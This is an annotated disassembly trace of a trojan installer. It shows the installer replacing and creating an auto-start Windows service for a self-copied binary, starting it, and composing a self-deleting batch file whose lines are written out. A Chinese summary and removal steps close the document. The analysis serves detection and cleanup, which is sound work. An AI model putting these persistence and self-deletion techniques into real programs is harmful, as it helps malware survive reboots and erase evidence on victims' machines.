00462D6A . 8B85 90FEFFFF mov eax,dword ptr ss:[ebp-170]
00462D70 . E8 F365FAFF call Setup.00409368 ; deletefile
00462D75 . 33C0 xor eax,eax
00462D77 . 5A pop edx
00462D78 . 59 pop ecx
00462D79 . 59 pop ecx
00462D7A . 64:8910 mov dword ptr fs:[eax],edx ; unlink the try-frame
00462D7D . EB 0A jmp short Setup.00462D89
00462D7F .^ E9 5C10FAFF jmp Setup.00403DE0 ; exception-handler entry (RTL)
00462D84 . E8 BF13FAFF call Setup.00404148 ; exception clean-up (RTL), then falls into the loop tail
00462D89 > 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164] ; search record
00462D8F . E8 9465FAFF call Setup.00409328 ; FindNext (analyst: "continue searching")
00462D94 . 85C0 test eax,eax
00462D96 .^ 0F84 45FFFFFF je Setup.00462CE1 ; 0 = another match -> loop (analyst's note: "loops over the .dat files")
00462D9C > 8D85 9CFEFFFF lea eax,dword ptr ss:[ebp-164]
00462DA2 . E8 A565FAFF call Setup.0040934C ; FindClose
;-----------------------------------------------------------------------
; 0041D904 / 0041D948 — remove a pre-existing service of the same name
; before (re)creating it. The function starts before this window (the
; OpenSCManagerA arguments and esi's initial value are set there) and
; ends after 0041D997.
; Register roles: ebx = SC manager handle, edi = service handle,
; esi = "deleted something" flag; [ebp-4] = service name; result byte
; in [ebp-5].
;-----------------------------------------------------------------------
004747DB . E8 2491FAFF call Setup.0041D904 ; analyst: step in — resolves the service name, then:
0041D948 . E8 6F9EFEFF call <jmp.&advapi32.OpenSCManagerA>
0041D94D . 8BD8 mov ebx,eax
0041D94F . 85DB test ebx,ebx
0041D951 . 74 31 je short Setup.0041D984 ; analyst labelled this "does the service exist?"; the test is on the SCM handle — SCM unavailable -> skip to the result
0041D953 . 68 FF010F00 push 0F01FF ; dwDesiredAccess = SERVICE_ALL_ACCESS
0041D958 . 8B45 FC mov eax,dword ptr ss:[ebp-4]
0041D95B . E8 7472FEFF call Setup.00404BD4 ; PChar(service name)
0041D960 . 50 push eax ; lpServiceName
0041D961 . 53 push ebx ; hSCManager
0041D962 . E8 5D9EFEFF call <jmp.&advapi32.OpenServiceA>
0041D967 . 8BF8 mov edi,eax
0041D969 . 85FF test edi,edi
0041D96B . 74 11 je short Setup.0041D97E ; no such service -> nothing to delete
0041D96D . 57 push edi
0041D96E . E8 319EFEFF call <jmp.&advapi32.DeleteService> ; mark the old service for deletion
0041D973 . BE 01000000 mov esi,1 ; remember that one was removed
0041D978 . 57 push edi
0041D979 . E8 0E9EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D97E > 53 push ebx
0041D97F . E8 089EFEFF call <jmp.&advapi32.CloseServiceHandle>
0041D984 > 85F6 test esi,esi
0041D986 . 7E 06 jle short Setup.0041D98E ; esi <= 0 (signed) -> False
0041D988 . C645 FB 01 mov byte ptr ss:[ebp-5],1 ; result := True (a service was deleted)
0041D98C . EB 04 jmp short Setup.0041D992
0041D98E > C645 FB 00 mov byte ptr ss:[ebp-5],0 ; result := False
0041D992 > 33C0 xor eax,eax
0041D994 . 5A pop edx
0041D995 . 59 pop ecx
0041D996 . 59 pop ecx
0041D997 . 64:8910 mov dword ptr fs:[eax],edx ; unlink the try-frame set up before this window (presumably)
;-----------------------------------------------------------------------
; 004747E0 — pause, then call the service-creation routine 0041D318.
; Argument marshalling (register convention, see 0041D320 below):
;   eax   = PChar(service name)  from [[479E24]]
;   edx   = PChar(display name)  from [[479CF0]]
;   ecx   = binary path          from [[479BE8]] (the self-copied file)
;   stack = description          from [[4799FC]] (read as [ebp+8] in the callee)
;-----------------------------------------------------------------------
004747E0 . 68 E8030000 push 3E8 ; 1s (0x3E8 = 1000 ms)
004747E5 . A1 C89B4700 mov eax,dword ptr ds:[479BC8]
004747EA . 8B00 mov eax,dword ptr ds:[eax]
004747EC . FFD0 call eax ; (kernel32.Sleep) — presumably to let the DeleteService from 0041D948 settle before re-creating
004747EE . A1 FC994700 mov eax,dword ptr ds:[4799FC]
004747F3 . 8B00 mov eax,dword ptr ds:[eax] ; service description
004747F5 . 50 push eax ; stack arg for 0041D318
004747F6 . A1 F09C4700 mov eax,dword ptr ds:[479CF0]
004747FB . 8B00 mov eax,dword ptr ds:[eax] ; display name
004747FD . E8 D203F9FF call Setup.00404BD4 ; PChar
00474802 . 50 push eax ; parked on the stack until the pop below
00474803 . A1 249E4700 mov eax,dword ptr ds:[479E24]
00474808 . 8B00 mov eax,dword ptr ds:[eax] ; service name
0047480A . E8 C503F9FF call Setup.00404BD4 ; eax = PChar(service name)
0047480F . 8B0D E89B4700 mov ecx,dword ptr ds:[479BE8] ; Setup.0047B4A8
00474815 . 8B09 mov ecx,dword ptr ds:[ecx] ; ecx = path of the self-copied file -> becomes the service's BinaryPathName
00474817 . 5A pop edx ; edx = PChar(display name)
00474818 . E8 FB8AFAFF call Setup.0041D318 ; analyst: step in — creates the service (the persistence mechanism)
;-----------------------------------------------------------------------
; 0041D320 — prologue of the service-creation routine (its push ebp /
; frame setup is just above this window) and the OpenSCManagerA failure
; path. Continues in the following blocks through 0041D4C5.
; Register roles: esi = service name, edi = display name,
; [ebp-4] = binary path, [ebp+8] = description, ebx = SCM handle.
; Helper guesses (confirm): 00404BC4 = string add-ref, 0040BFE8 =
; integer -> string, 0040C814 = exception-object constructor,
; 004040CC = raise.
;-----------------------------------------------------------------------
0041D320 . 57 push edi
0041D321 . 33DB xor ebx,ebx
0041D323 . 895D E0 mov dword ptr ss:[ebp-20],ebx ; zero the string locals
0041D326 . 895D E4 mov dword ptr ss:[ebp-1C],ebx
0041D329 . 895D EC mov dword ptr ss:[ebp-14],ebx
0041D32C . 894D FC mov dword ptr ss:[ebp-4],ecx ; [ebp-4] = binary path (analyst: "the trojan's directory")
0041D32F . 8BFA mov edi,edx ; edi = display name
0041D331 . 8BF0 mov esi,eax ; esi = service name
0041D333 . 8B45 FC mov eax,dword ptr ss:[ebp-4] ; binary path (analyst: "trojan path into eax")
0041D336 . E8 8978FEFF call Setup.00404BC4 ; 00404BC4 on the path string (analyst's label was "get description"; the argument here is the path — presumably a string add-ref, confirm)
0041D33B . 8B45 08 mov eax,dword ptr ss:[ebp+8] ; description (stack arg)
0041D33E . E8 8178FEFF call Setup.00404BC4 ; same helper on the description
0041D343 . 33C0 xor eax,eax
····
····
0041D36F . E8 48A4FEFF call <jmp.&advapi32.OpenSCManagerA> ; OpenSCManagerA> (arguments pushed in the elided lines)
0041D374 . 8BD8 mov ebx,eax
0041D376 . 85DB test ebx,ebx
0041D378 . 75 2E jnz short Setup.0041D3A8 ; opened -> continue to CreateServiceA (analyst: "did the open succeed?")
0041D37A . E8 B997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError
0041D37F . 8D55 E4 lea edx,dword ptr ss:[ebp-1C]
0041D382 . E8 61ECFEFF call Setup.0040BFE8 ; error code -> string
0041D387 . 8B4D E4 mov ecx,dword ptr ss:[ebp-1C]
0041D38A . B2 01 mov dl,1 ; construct flag
0041D38C . A1 CC7B4000 mov eax,dword ptr ds:[407BCC] ; exception class
0041D391 . E8 7EF4FEFF call Setup.0040C814 ; build the exception object with that message
0041D396 . E8 316DFEFF call Setup.004040CC ; raise (presumably)
0041D39B . 33C0 xor eax,eax
0041D39D . 5A pop edx
0041D39E . 59 pop ecx
0041D39F . 59 pop ecx
0041D3A0 . 64:8910 mov dword ptr fs:[eax],edx
0041D3A3 . E9 2D010000 jmp Setup.0041D4D5 ; to the common epilogue
; --- back in the caller after 0041D318 returns (Boolean result in al) ---
0047481D . 84C0 test al,al
0047481F . 75 75 jnz short Setup.00474896 ; service created -> continue (analyst: "did it succeed?")
00474821 . 6A 00 push 0
00474823 . A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474828 . 8B00 mov eax,dword ptr ds:[eax]
0047482A . FFD0 call eax ; ExitProcess — no service, no further action; no fallback persistence is visible here
0047482C . EB 68 jmp short Setup.00474896 ; unreachable (ExitProcess does not return)
0047482E > 8B15 249E4700 mov edx,dword ptr ds:[479E24] ; Setup.0047B4F4 — service-name global; this label is reached from elsewhere
;-----------------------------------------------------------------------
; 0041D3BA — inside 0041D318: CreateServiceA. The trailing arguments
; (lpLoadOrderGroup, lpdwTagId, lpDependencies, lpServiceStartName,
; lpPassword) were pushed above this window. Detection: a new auto-start
; service is recorded in the System event log (Service Control Manager
; event 7045) with exactly the display name and binary path seen here.
;-----------------------------------------------------------------------
0041D3BA . 50 push eax ; |BinaryPathName = the self-copied file
0041D3BB . 6A 00 push 0 ; |ErrorControl = SERVICE_ERROR_IGNORE
0041D3BD . 6A 02 push 2 ; |StartType = SERVICE_AUTO_START (runs at boot -> persistence)
0041D3BF . 68 10010000 push 110 ; |ServiceType = SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS
0041D3C4 . 68 FF010F00 push 0F01FF ; |DesiredAccess = SERVICE_ALL_ACCESS
0041D3C9 . 57 push edi ; |DisplayName
0041D3CA . 56 push esi ; |ServiceName
0041D3CB . 53 push ebx ; |hManager
0041D3CC . E8 CBA3FEFF call <jmp.&advapi32.CreateServiceA> ; \CreateServiceA
0041D3D1 . 8945 F4 mov dword ptr ss:[ebp-C],eax ; [ebp-C] = hService
0041D3D4 . 837D F4 00 cmp dword ptr ss:[ebp-C],0
0041D3D8 . 75 2E jnz short Setup.0041D408 ; created -> set the description (next block)
0041D3DA . E8 5997FEFF call <jmp.&kernel32.GetLastError> ; [GetLastError
0041D3DF . 8D55 E0 lea edx,dword ptr ss:[ebp-20] ; error path mirrors 0041D37A: error code -> string -> raise (continues past this window)
;-----------------------------------------------------------------------
; 0041D465 — set the service description, start the service, release the
; handle. ChangeServiceConfig2A is reached through the runtime-resolved
; pointer at [479E08]. StartServiceA's dwNumServiceArgs /
; lpServiceArgVectors were pushed above this window; the lines between
; 0041D47B and 0041D4AF are elided in the trace.
;-----------------------------------------------------------------------
0041D465 . E8 56C3FEFF call Setup.004097C0 ; analyst: copies the description string into the buffer at [ebp-10]
0041D46A . 8B45 F0 mov eax,dword ptr ss:[ebp-10]
0041D46D . 50 push eax ; lpInfo -> SERVICE_DESCRIPTION (presumably; the struct layout is not visible)
0041D46E . 6A 01 push 1 ; dwInfoLevel = 1 = SERVICE_CONFIG_DESCRIPTION
0041D470 . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D473 . 50 push eax ; hService
0041D474 . A1 089E4700 mov eax,dword ptr ds:[479E08]
0041D479 . 8B00 mov eax,dword ptr ds:[eax]
0041D47B . FFD0 call eax ; (advapi32.ChangeServiceConfig2A)
0041D4AF . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D4B2 . 50 push eax ; hService
0041D4B3 . E8 3CA3FEFF call <jmp.&advapi32.StartServiceA> ; StartServiceA — from here the copied binary runs as a service
0041D4B8 . 8B45 F4 mov eax,dword ptr ss:[ebp-C]
0041D4BB . 50 push eax
0041D4BC . E8 CBA2FEFF call <jmp.&advapi32.CloseServiceHandle>
0041D4C1 . 33C0 xor eax,eax
0041D4C3 . 5A pop edx
0041D4C4 . 59 pop ecx
0041D4C5 . 59 pop ecx ; try-frame teardown continues past this window
; --- second view of 0047481F (same lines as at 0047481D above, with the jump-arrow column) ---
0047481F . /75 75 jnz short Setup.00474896 ; analyst: "created successfully? exit if not"
00474821 . |6A 00 push 0
00474823 . |A1 C49C4700 mov eax,dword ptr ds:[479CC4]
00474828 . |8B00 mov eax,dword ptr ds:[eax]
0047482A . |FFD0 call eax ; ExitProcess
0047482C . |EB 68 jmp short Setup.00474896
0047482E > |8B15 249E4700 mov edx,dword ptr ds:[479E24] ; Setup.0047B4F4
00474834 . |8B12 mov edx,dword ptr ds:[edx] ; edx = service name
00474836 . |33C0 xor eax,eax ; the trace jumps ahead after this line
;-----------------------------------------------------------------------
; 004748A3 — optional "installed" message box. The push order
; (uType, caption, text, hWnd) matches MessageBoxA through the runtime-
; resolved pointer at [479BB0] — confirm. Both strings are usable as
; static indicators for this build.
;-----------------------------------------------------------------------
004748A3 . /75 20 jnz short Setup.004748C5 ; analyst: the builder's "show prompt" option — skipped unless it was selected (which would give the install away)
004748A5 . |803D 74C64700>cmp byte ptr ds:[47C674],0 ; second switch: [47C674] must be 0 for the box to appear
004748AC . |75 17 jnz short Setup.004748C5
004748AE . |6A 40 push 40 ; uType = 0x40 = MB_ICONINFORMATION
004748B0 . |68 78494700 push Setup.00474978 ; ASCII "wo shi mu ma" (caption; pinyin for "I am a trojan")
004748B5 . |68 84494700 push Setup.00474984 ; ASCII "installed successfully" (text)
004748BA . |6A 00 push 0 ; hWnd = NULL
004748BC . |A1 B09B4700 mov eax,dword ptr ds:[479BB0]
004748C1 . |8B00 mov eax,dword ptr ds:[eax]
004748C3 . |FFD0 call eax ; MessageBoxA (presumably)
004748C5 > \A1 949A4700 mov eax,dword ptr ds:[479A94] ; next decision: self-delete (continues below)
; --- self-delete decision (condition computed from [[479A94]] above) ---
004748CD . /74 12 je short Setup.004748E1 ; flag clear -> straight to ExitProcess, leaving the installer on disk
004748CF . |8D55 E0 lea edx,dword ptr ss:[ebp-20] ; out-string (analyst labelled the slot "description"; here it receives the own path)
004748D2 . |33C0 xor eax,eax ; index 0 -> own executable
004748D4 . |E8 8BE2F8FF call Setup.00402B64 ; own module path (next block shows its inside)
;-----------------------------------------------------------------------
; 00402B7A — inside 00402B64: index 0 -> GetModuleFileNameA(NULL, buf,
; 0x105) into a stack buffer, then build a string from it; any other
; index -> GetCommandLineA (parsing not shown). Shape of Delphi's
; ParamStr — confirm. The index test and the function's start/end are
; outside this window; ebx = result-string variable.
;-----------------------------------------------------------------------
00402B7A |. /75 1E jnz short Setup.00402B9A ; index != 0 -> command-line branch
00402B7C |. |68 05010000 push 105 ; /BufSize = 105 (261.) = MAX_PATH + 1
00402B81 |. |8D4424 04 lea eax,dword ptr ss:[esp+4] ; |
00402B85 |. |50 push eax ; |PathBuffer (on the stack)
00402B86 |. |6A 00 push 0 ; |hModule = NULL -> the running executable
00402B88 |. |E8 27E7FFFF call <jmp.&kernel32.GetModuleFileNameA> ; \GetModuleFileNameA
00402B8D |. |8BC8 mov ecx,eax ; ecx = characters written
00402B8F |. |8BD4 mov edx,esp ; edx = buffer
00402B91 |. |8BC3 mov eax,ebx ; eax = destination string variable
00402B93 |. |E8 6C1C0000 call Setup.00404804 ; string := buffer[0..ecx) (confirm)
00402B98 |. |EB 1E jmp short Setup.00402BB8
00402B9A |> \E8 F5E6FFFF call <jmp.&kernel32.GetCommandLineA> ; [GetCommandLineA — other indices start from the command line
; --- back at 004748D9 with the own path in [ebp-20] ---
004748D9 . |8B45 E0 mov eax,dword ptr ss:[ebp-20] ; eax = own path
004748DC . |E8 4F39FFFF call Setup.00468230 ; analyst: step in — self-deletion through a generated .bat, "a classic" (next block)
;-----------------------------------------------------------------------
; 00468296 — inside 00468230: composes the self-delete batch file.
; ebx is a string-list-like object (class [413010]); each
; `call [ecx+38]` with a string in edx appends one line (Add-like —
; confirm). [ebp-4] holds the path to delete (the own path passed in).
; Lines added, in order:
;   :delfile
;   del "<path>"
;   if exist "<path>" goto delfile
;   del %0
;   exit
; i.e. retry until the executable is no longer locked, then the batch
; removes itself. Forensically the .bat is transient; look for the
; short-lived command interpreter and the disappearance of the original
; installer (how the batch is written out and launched is outside this
; window). Function starts before and ends after this window; the first
; two parts of the .bat name were pushed before 00468296.
; Helper guess (confirm): 00404A94 with edx = n is an n-part concat.
;-----------------------------------------------------------------------
00468296 . 68 DC834600 push Setup.004683DC ; .bat
0046829B . 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; [ebp-8] = batch file name
0046829E . BA 03000000 mov edx,3 ; 3 parts
004682A3 . E8 ECC7F9FF call Setup.00404A94 ; name := part1 + part2 + ".bat"
004682A8 . B2 01 mov dl,1 ; construct flag
004682AA . A1 10304100 mov eax,dword ptr ds:[413010] ; same class as at 00463982
004682AF . E8 5CB6F9FF call Setup.00403910
004682B4 . 8BD8 mov ebx,eax ; ebx = line list
004682B6 . BA EC834600 mov edx,Setup.004683EC ; :delfile
004682BB . 8BC3 mov eax,ebx
004682BD . 8B08 mov ecx,dword ptr ds:[eax]
004682BF . FF51 38 call dword ptr ds:[ecx+38] ; Add(":delfile") — the loop label
004682C2 . 68 00844600 push Setup.00468400 ; del "
004682C7 . FF75 FC push dword ptr ss:[ebp-4] ; <path>
004682CA . 68 10844600 push Setup.00468410 ; "
004682CF . 8D45 98 lea eax,dword ptr ss:[ebp-68]
004682D2 . BA 03000000 mov edx,3
004682D7 . E8 B8C7F9FF call Setup.00404A94 ; [ebp-68] := del "<path>"
004682DC . 8B55 98 mov edx,dword ptr ss:[ebp-68]
004682DF . 8BC3 mov eax,ebx
004682E1 . 8B08 mov ecx,dword ptr ds:[eax]
004682E3 . FF51 38 call dword ptr ds:[ecx+38] ; Add
004682E6 . 68 1C844600 push Setup.0046841C ; if exist "
004682EB . FF75 FC push dword ptr ss:[ebp-4]
004682EE . 68 30844600 push Setup.00468430 ; " goto delfile
004682F3 . 8D45 94 lea eax,dword ptr ss:[ebp-6C]
004682F6 . BA 03000000 mov edx,3
004682FB . E8 94C7F9FF call Setup.00404A94 ; [ebp-6C] := if exist "<path>" goto delfile
00468300 . 8B55 94 mov edx,dword ptr ss:[ebp-6C]
00468303 . 8BC3 mov eax,ebx
00468305 . 8B08 mov ecx,dword ptr ds:[eax]
00468307 . FF51 38 call dword ptr ds:[ecx+38] ; Add — the retry loop
0046830A . BA 48844600 mov edx,Setup.00468448 ; del %0
0046830F . 8BC3 mov eax,ebx
00468311 . 8B08 mov ecx,dword ptr ds:[eax]
00468313 . FF51 38 call dword ptr ds:[ecx+38] ; Add — the batch deletes itself
00468316 . BA 58844600 mov edx,Setup.00468458 ; exit — last line; its Add, saving the list and launching it are past this window
; --- common exit ---
004748E1 > \6A 00 push 0 ; uExitCode = 0
004748E3 . A1 C49C4700 mov eax,dword ptr ds:[479CC4]
004748E8 . 8B00 mov eax,dword ptr ds:[eax]
004748EA . FFD0 call eax ; kernel32.ExitProcess) — the installer ends here; the service created above carries on
大体流程:
1.创建互斥体判断是否已经运行,运行则退出。
2.检查自复制目录中是否已有副本,有则删除并重新自复制,然后设置文件属性。
3.程序读自身的一些加密配置数据(安装目录和上线信息),然后解密。
4.创建服务达到自启动。
5.自删除。
查杀方法:
打开XueTr.exe,查找服务,可以明显看到木马(字体颜色有差异),断开网络,停止服务,按路径找到文件直接删除。